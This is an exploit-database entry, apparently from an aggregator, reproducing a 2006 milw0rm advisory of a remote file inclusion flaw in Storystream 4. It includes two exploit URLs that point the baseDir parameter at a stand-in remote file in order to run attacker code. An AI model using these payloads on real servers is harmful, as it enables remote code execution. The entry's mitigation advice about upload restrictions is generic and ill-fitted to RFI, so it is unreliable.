How I Can lives Without FooL Programmer!

vendor:

Storystream

by:

v1per-haCker

9.3

CVSS

HIGH

Remote File Inclusion (RFI)

CWE

Product Name: Storystream

Affected Version From: 4

Affected Version To: 4

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

How I Can lives Without FooL Programmer!

Storystream is vulnerable to Remote File Inclusion (RFI) vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. The attacker can execute arbitrary code on the vulnerable server by including malicious files from a remote location. The vulnerable scripts are include/classes/pear/DB/mysql.php and include/classes/pear/DB/mysqli.php. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server.

Mitigation:

The best way to mitigate RFI vulnerability is to restrict the file types that can be uploaded to the server. Also, the application should validate the user input and filter out any malicious code.

Source

Exploit-DB raw data:

#########################################################################################
################################### v1per-haCker
########################################
###################### How I Can lives Without FooL Programmer!
#########################
#########################################################################################
#=======================================================================================#
#___________________________________Storystream (RFI)___________________________________#
#=======================================================================================#
# Information:-                                                                         #
#                                                                                       #
# Scripts: Storystream                                                                  #
# download :    http://www.iwonderdesigns.com/downloads/storystream_beta_0.4.0.0.zip    #
# Version : 4                                                                           #
# Dork & vuln : download script and think :)                                            #
#                                                                                       #
#=======================================================================================#
# Exploit :                                                                             #
#                                                                                       #
#http://localhost/path/include/classes/pear/DB/mysql.php?baseDir=http://EvElCoDe.txt?   #
#http://localhost/path/include/classes/pear/DB/mysqli.php?baseDir=http://EvElCoDe.txt?  #
#                                                                                       #
#=======================================================================================#
# Discoverd By : v1per-haCker                                                           #
#                                                                                       #
# Conatact : v1per-hacker[at]hotmail.com                                                #
#                                                                                       #
# XP10_hackEr Team              >>      www.xp10.com                                    #
# SpeciaL PoweR SecuritY TeaM   >>      www.specialpower.org                            #
#                                                                                       #
# Greetz to :   | abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL  |		#
#               | ThE-WoLf-KsA | mohandko | fooooz | maVen | ShikAa | K3BAB |           #
#               | metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero | Afroota   |           #
#               | MainstreaM | CoDeR | Simo-64 | Super-CrystaL | KoolholiO  |           #
#               |  MuhaciR  |Skrmhcr-GVinux | Jean | fucker_net | Sir-ToTTi |           #
#                                                                                       #
# Thanks >>     /str0ke & www.milw0rm.com & www.google.com                              #
#=======================================================================================#
#########################################################################################
################################# L0ve is L1fe W0und3r
##################################
#########################################################################################

# milw0rm.com [2006-11-12]